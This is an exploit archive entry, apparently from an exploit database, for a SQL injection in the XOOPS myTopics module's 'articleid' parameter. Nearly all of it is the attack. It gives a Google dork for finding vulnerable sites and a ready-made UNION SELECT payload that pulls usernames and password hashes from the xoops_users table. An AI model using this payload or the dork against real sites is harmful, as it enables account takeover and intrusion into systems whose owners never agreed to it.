Topic : | XOOPS Module myTopics (articleid) Remote SQL Injection Vulnerability
|
ExploitAlert : 3408
Credit : S@BUN
Date : 18.02.2008
Download
Plain text version
 Exploit Code : ###############################################################
#
# XOOPS Module myTopics-print SQL Injection(articleid)
#
###############################################################
#
# AUTHOR : S@BUN
#
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "/modules/myTopics/"
#
# you can add expliot after mytopics
#
################################################################
EXPLOIT :
-9999999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pas
s),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,
0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%
200%201%20
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|